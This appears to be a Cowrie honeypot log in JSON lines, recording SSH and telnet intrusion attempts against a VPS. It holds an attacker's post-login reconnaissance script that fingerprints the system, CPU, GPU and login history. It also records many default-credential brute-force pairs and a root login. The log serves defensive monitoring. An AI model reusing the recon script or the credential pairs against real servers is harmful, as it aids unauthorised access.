{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.569401Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.570349Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.571820Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.573020Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.573689Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.574457Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.575616Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.576319Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.576943Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.577759Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.578532Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.579180Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.903899Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.905008Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:44.906015Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49258,"dst_ip":"1.2.3.4","dst_port":22,"session":"f76b7ee3969e","protocol":"ssh","message":"New connection: 212.227.125.160:49258 (1.2.3.4:22) [session: f76b7ee3969e]","sensor":"my-vps","timestamp":"2025-08-26T11:57:45.233798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:45.240450Z","src_ip":"212.227.125.160","session":"f76b7ee3969e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:45.288738Z","src_ip":"212.227.125.160","session":"f76b7ee3969e"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo","message":"login attempt [odoo/odoo] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:45.537907Z","src_ip":"212.227.125.160","session":"f76b7ee3969e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:46.592067Z","src_ip":"212.227.125.160","session":"f76b7ee3969e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40066,"dst_ip":"1.2.3.4","dst_port":23,"session":"82ea5aeca305","protocol":"telnet","message":"New connection: 212.227.235.229:40066 (1.2.3.4:23) [session: 82ea5aeca305]","sensor":"my-vps","timestamp":"2025-08-26T11:57:50.668992Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:57:50.858739Z","src_ip":"212.227.235.229","session":"82ea5aeca305"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:57:50.932680Z","src_ip":"212.227.235.229","session":"82ea5aeca305"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50028,"dst_ip":"1.2.3.4","dst_port":22,"session":"df34b884b324","protocol":"ssh","message":"New connection: 212.227.125.160:50028 (1.2.3.4:22) [session: df34b884b324]","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.346854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.347751Z","src_ip":"212.227.125.160","session":"df34b884b324"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.402527Z","src_ip":"212.227.125.160","session":"df34b884b324"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37936,"dst_ip":"1.2.3.4","dst_port":22,"session":"120e9db6278a","protocol":"ssh","message":"New connection: 83.168.105.65:37936 (1.2.3.4:22) [session: 120e9db6278a]","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.433758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.434738Z","src_ip":"83.168.105.65","session":"120e9db6278a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.470422Z","src_ip":"83.168.105.65","session":"120e9db6278a"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.556137Z","src_ip":"212.227.125.160","session":"df34b884b324"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:51.578208Z","src_ip":"83.168.105.65","session":"120e9db6278a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:52.616197Z","src_ip":"83.168.105.65","session":"120e9db6278a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:52.637298Z","src_ip":"212.227.125.160","session":"df34b884b324"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50796,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c50ac2a57ce","protocol":"ssh","message":"New connection: 212.227.125.160:50796 (1.2.3.4:22) [session: 4c50ac2a57ce]","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.011649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.012536Z","src_ip":"212.227.125.160","session":"4c50ac2a57ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.061800Z","src_ip":"212.227.125.160","session":"4c50ac2a57ce"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.213189Z","src_ip":"212.227.125.160","session":"4c50ac2a57ce"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37970,"dst_ip":"1.2.3.4","dst_port":22,"session":"96880280d2f1","protocol":"ssh","message":"New connection: 196.251.86.249:37970 (1.2.3.4:22) [session: 96880280d2f1]","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.315148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.933554Z","src_ip":"196.251.86.249","session":"96880280d2f1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:57:57.934288Z","src_ip":"196.251.86.249","session":"96880280d2f1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:58.264326Z","src_ip":"212.227.125.160","session":"4c50ac2a57ce"}
{"eventid":"cowrie.login.failed","username":"git","password":"passpass","message":"login attempt [git/passpass] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:00.067026Z","src_ip":"196.251.86.249","session":"96880280d2f1"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:01.646910Z","src_ip":"196.251.86.249","session":"96880280d2f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51568,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e72475ac321","protocol":"ssh","message":"New connection: 212.227.125.160:51568 (1.2.3.4:22) [session: 8e72475ac321]","sensor":"my-vps","timestamp":"2025-08-26T11:58:02.695564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:02.696334Z","src_ip":"212.227.125.160","session":"8e72475ac321"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:02.842296Z","src_ip":"212.227.125.160","session":"8e72475ac321"}
{"eventid":"cowrie.login.failed","username":"jfletcher","password":"jfletcher","message":"login attempt [jfletcher/jfletcher] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:03.544060Z","src_ip":"212.227.125.160","session":"8e72475ac321"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:04.597205Z","src_ip":"212.227.125.160","session":"8e72475ac321"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":38452,"dst_ip":"1.2.3.4","dst_port":22,"session":"86c99b47ad76","protocol":"ssh","message":"New connection: 83.168.105.65:38452 (1.2.3.4:22) [session: 86c99b47ad76]","sensor":"my-vps","timestamp":"2025-08-26T11:58:07.025016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:07.025846Z","src_ip":"83.168.105.65","session":"86c99b47ad76"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:07.065931Z","src_ip":"83.168.105.65","session":"86c99b47ad76"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:07.186106Z","src_ip":"83.168.105.65","session":"86c99b47ad76"}
